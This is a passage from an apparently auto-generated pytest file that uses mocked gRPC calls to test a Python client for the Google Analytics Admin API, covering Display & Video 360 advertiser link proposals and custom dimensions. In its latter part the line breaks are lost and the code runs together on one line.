            == analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert isinstance(
        response, analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse
    )


def test_approve_display_video360_advertiser_link_proposal_from_dict():
    test_approve_display_video360_advertiser_link_proposal(request_type=dict)


def test_approve_display_video360_advertiser_link_proposal_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.approve_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        client.approve_display_video360_advertiser_link_proposal()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest()
        )


@pytest.mark.asyncio
async def test_approve_display_video360_advertiser_link_proposal_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.approve_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse()
        )
        response = await client.approve_display_video360_advertiser_link_proposal(
            request
        )

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert isinstance(
        response, analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse
    )


@pytest.mark.asyncio
async def test_approve_display_video360_advertiser_link_proposal_async_from_dict():
    await test_approve_display_video360_advertiser_link_proposal_async(
        request_type=dict
    )


def test_approve_display_video360_advertiser_link_proposal_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.approve_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = (
            analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse()
        )
        client.approve_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_approve_display_video360_advertiser_link_proposal_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.approve_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse()
        )
        await client.approve_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_cancel_display_video360_advertiser_link_proposal(
    transport: str = "grpc",
    request_type=analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest,
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.cancel_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.DisplayVideo360AdvertiserLinkProposal(
            name="name_value",
            advertiser_id="advertiser_id_value",
            advertiser_display_name="advertiser_display_name_value",
            validation_email="validation_email_value",
        )
        response = client.cancel_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal)
    assert response.name == "name_value"
    assert response.advertiser_id == "advertiser_id_value"
    assert response.advertiser_display_name == "advertiser_display_name_value"
    assert response.validation_email == "validation_email_value"


def test_cancel_display_video360_advertiser_link_proposal_from_dict():
    test_cancel_display_video360_advertiser_link_proposal(request_type=dict)


def test_cancel_display_video360_advertiser_link_proposal_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.cancel_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        client.cancel_display_video360_advertiser_link_proposal()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest()
        )


@pytest.mark.asyncio
async def test_cancel_display_video360_advertiser_link_proposal_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.cancel_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DisplayVideo360AdvertiserLinkProposal(
                name="name_value",
                advertiser_id="advertiser_id_value",
                advertiser_display_name="advertiser_display_name_value",
                validation_email="validation_email_value",
            )
        )
        response = await client.cancel_display_video360_advertiser_link_proposal(
            request
        )

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert (
            args[0]
            == analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest()
        )

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal)
    assert response.name == "name_value"
    assert response.advertiser_id == "advertiser_id_value"
    assert response.advertiser_display_name == "advertiser_display_name_value"
    assert response.validation_email == "validation_email_value"


@pytest.mark.asyncio
async def test_cancel_display_video360_advertiser_link_proposal_async_from_dict():
    await test_cancel_display_video360_advertiser_link_proposal_async(request_type=dict)


def test_cancel_display_video360_advertiser_link_proposal_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.cancel_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = resources.DisplayVideo360AdvertiserLinkProposal()
        client.cancel_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_cancel_display_video360_advertiser_link_proposal_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.cancel_display_video360_advertiser_link_proposal),
        "__call__",
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.DisplayVideo360AdvertiserLinkProposal()
        )
        await client.cancel_display_video360_advertiser_link_proposal(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_create_custom_dimension(
    transport: str = "grpc", request_type=analytics_admin.CreateCustomDimensionRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_custom_dimension), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.CustomDimension(
            name="name_value",
            parameter_name="parameter_name_value",
            display_name="display_name_value",
            description="description_value",
            scope=resources.CustomDimension.DimensionScope.EVENT,
            disallow_ads_personalization=True,
        )
        response = client.create_custom_dimension(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateCustomDimensionRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.CustomDimension)
    assert response.name == "name_value"
    assert response.parameter_name == "parameter_name_value"
    assert response.display_name == "display_name_value"
    assert response.description == "description_value"
    assert response.scope == resources.CustomDimension.DimensionScope.EVENT
    assert response.disallow_ads_personalization is True


def test_create_custom_dimension_from_dict():
    test_create_custom_dimension(request_type=dict)


def test_create_custom_dimension_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_custom_dimension), "__call__"
    ) as call:
        client.create_custom_dimension()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateCustomDimensionRequest()


@pytest.mark.asyncio
async def test_create_custom_dimension_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.CreateCustomDimensionRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_custom_dimension), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.CustomDimension(
                name="name_value",
                parameter_name="parameter_name_value",
                display_name="display_name_value",
                description="description_value",
                scope=resources.CustomDimension.DimensionScope.EVENT,
                disallow_ads_personalization=True,
            )
        )
        response = await client.create_custom_dimension(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateCustomDimensionRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.CustomDimension)
    assert response.name == "name_value"
    assert response.parameter_name == "parameter_name_value"
    assert response.display_name == "display_name_value"
    assert response.description == "description_value"
    assert response.scope == resources.CustomDimension.DimensionScope.EVENT
    assert response.disallow_ads_personalization is True


@pytest.mark.asyncio
async def test_create_custom_dimension_async_from_dict():
    await test_create_custom_dimension_async(request_type=dict)


def test_create_custom_dimension_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateCustomDimensionRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_custom_dimension), "__call__"
    ) as call:
        call.return_value = resources.CustomDimension()
        client.create_custom_dimension(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_create_custom_dimension_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateCustomDimensionRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_custom_dimension), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.CustomDimension()
        )
        await client.create_custom_dimension(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_create_custom_dimension_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_custom_dimension), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.CustomDimension()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_custom_dimension(
            parent="parent_value",
            custom_dimension=resources.CustomDimension(name="name_value"),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[0].custom_dimension == resources.CustomDimension(name="name_value")


def test_create_custom_dimension_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.create_custom_dimension(
            analytics_admin.CreateCustomDimensionRequest(),
            parent="parent_value",
            custom_dimension=resources.CustomDimension(name="name_value"),
        )


@pytest.mark.asyncio
async def test_create_custom_dimension_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_custom_dimension), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        # NOTE(review): the next assignment is dead code — it is immediately
        # overwritten by the FakeUnaryUnaryCall assignment below (generator
        # artifact; harmless but redundant).
        call.return_value = resources.CustomDimension()
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.CustomDimension()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.create_custom_dimension(
            parent="parent_value",
            custom_dimension=resources.CustomDimension(name="name_value"),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[0].custom_dimension == resources.CustomDimension(name="name_value")


@pytest.mark.asyncio
async def test_create_custom_dimension_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
with pytest.raises(ValueError): await client.create_custom_dimension( analytics_admin.CreateCustomDimensionRequest(), parent="parent_value", custom_dimension=resources.CustomDimension(name="name_value"), ) def test_update_custom_dimension( transport: str = "grpc", request_type=analytics_admin.UpdateCustomDimensionRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) response = client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True def test_update_custom_dimension_from_dict(): test_update_custom_dimension(request_type=dict) def test_update_custom_dimension_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. 
request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: client.update_custom_dimension() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomDimensionRequest() @pytest.mark.asyncio async def test_update_custom_dimension_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateCustomDimensionRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) ) response = await client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomDimensionRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True @pytest.mark.asyncio async def test_update_custom_dimension_async_from_dict(): await test_update_custom_dimension_async(request_type=dict) def test_update_custom_dimension_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateCustomDimensionRequest() request.custom_dimension.name = "custom_dimension.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: call.return_value = resources.CustomDimension() client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_dimension.name=custom_dimension.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_custom_dimension_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateCustomDimensionRequest() request.custom_dimension.name = "custom_dimension.name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) await client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_dimension.name=custom_dimension.name/value", ) in kw["metadata"] def test_update_custom_dimension_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_custom_dimension( custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].custom_dimension == resources.CustomDimension(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_custom_dimension_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.update_custom_dimension( analytics_admin.UpdateCustomDimensionRequest(), custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_custom_dimension_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_custom_dimension( custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].custom_dimension == resources.CustomDimension(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_custom_dimension_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.update_custom_dimension( analytics_admin.UpdateCustomDimensionRequest(), custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_custom_dimensions( transport: str = "grpc", request_type=analytics_admin.ListCustomDimensionsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomDimensionsResponse( next_page_token="next_page_token_value", ) response = client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomDimensionsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomDimensionsPager) assert response.next_page_token == "next_page_token_value" def test_list_custom_dimensions_from_dict(): test_list_custom_dimensions(request_type=dict) def test_list_custom_dimensions_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: client.list_custom_dimensions() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomDimensionsRequest() @pytest.mark.asyncio async def test_list_custom_dimensions_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListCustomDimensionsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomDimensionsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomDimensionsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomDimensionsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_custom_dimensions_async_from_dict(): await test_list_custom_dimensions_async(request_type=dict) def test_list_custom_dimensions_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. 
request = analytics_admin.ListCustomDimensionsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: call.return_value = analytics_admin.ListCustomDimensionsResponse() client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_custom_dimensions_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListCustomDimensionsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomDimensionsResponse() ) await client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_custom_dimensions_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = analytics_admin.ListCustomDimensionsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_custom_dimensions(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_custom_dimensions_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_custom_dimensions( analytics_admin.ListCustomDimensionsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_custom_dimensions_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomDimensionsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomDimensionsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_custom_dimensions(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_custom_dimensions_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
